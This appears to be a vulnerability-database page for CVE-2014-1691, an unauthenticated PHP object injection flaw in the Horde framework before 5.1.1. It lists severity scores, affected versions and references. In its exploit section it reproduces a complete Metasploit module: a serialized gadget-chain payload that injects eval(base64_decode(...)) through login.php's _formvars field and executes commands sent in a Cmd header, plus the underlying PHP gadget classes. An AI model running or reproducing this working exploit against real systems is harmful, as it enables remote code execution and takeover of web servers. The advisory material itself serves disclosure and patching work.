CVE-2014-1691
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
The framework/Util/lib/Horde/Variables.php script in the Util library in Horde before 5.1.1 allows remote attackers to conduct object injection attacks and execute arbitrary PHP code via a crafted serialized object in the _formvars form.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 32439
Publication date : 2014-03-21 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Horde Framework Unserialize PHP Code Execution',
'Description' => %q{
This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
abused to allow unauthenticated users to execute arbitrary code with the permissions of
the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
class to reach a dangerous call_user_func() call in the Horde_Prefs class.
},
'Author' =>
[
'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-1691' ],
[ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
[ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
[ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'DisableNops' => true
},
'Targets' => [ ['Horde 5', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 27 2013'
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
], self.class)
end
def check
flag = rand_text_alpha(rand(10)+20)
res = send_request_exploit("print #{flag};die;")
if res and res.body and res.body.to_s =~ /#{flag}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Testing injection...")
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
end
print_status("#{peer} - Exploiting the unserialize()...")
send_request_exploit(payload.encoded)
end
def send_request_exploit(p)
php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"
payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
send_request_cgi(
{
'uri' => normalize_uri(target_uri.path.to_s, "login.php"),
'method' => 'POST',
'vars_post' => {
'_formvars' => payload_serialized
},
'headers' => {
'Cmd' => Rex::Text.encode_base64(p)
}
})
end
end
=begin
PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
class Horde_Config
{
protected $_oldConfig = "phpinfo();die;";
}
class Horde_Prefs_Scope
{
protected $_prefs = array(1);
}
class Horde_Prefs
{
protected $_opts, $_scopes;
function __construct()
{
$this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
$this->_scopes['horde'] = new Horde_Prefs_Scope;
}
}
class Horde_Prefs_Identity
{
protected $_prefs, $_prefnames;
function __construct()
{
$this->_prefs = new Horde_Prefs;
$this->_prefnames['identities'] = 0;
}
}
class Horde_Kolab_Server_Decorator_Clean
{
private $_server, $_added = array(1);
function __construct()
{
$this->_server = new Horde_Prefs_Identity;
}
}
$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
=end
Products Mentioned
Configuraton 0
Horde>>Horde_application_framework >> Version To (including) 5.1.0
- Horde>>Horde_application_framework >> Version 1.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.1.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.10 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.11 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.12 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.10 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.10 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.11 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.12 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.13 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.14 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.15 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.16 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.0
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.1
- Horde>>Horde_application_framework >> Version 5.0.1 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.2
- Horde>>Horde_application_framework >> Version 5.0.2 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.3
- Horde>>Horde_application_framework >> Version 5.0.3 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.4
- Horde>>Horde_application_framework >> Version 5.0.4 (Open CPE detail)
References
https://github.com/horde/horde/blob/82c400788537cfc0106b68447789ff53793ac086/bundles/groupware/docs/CHANGES#L215
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.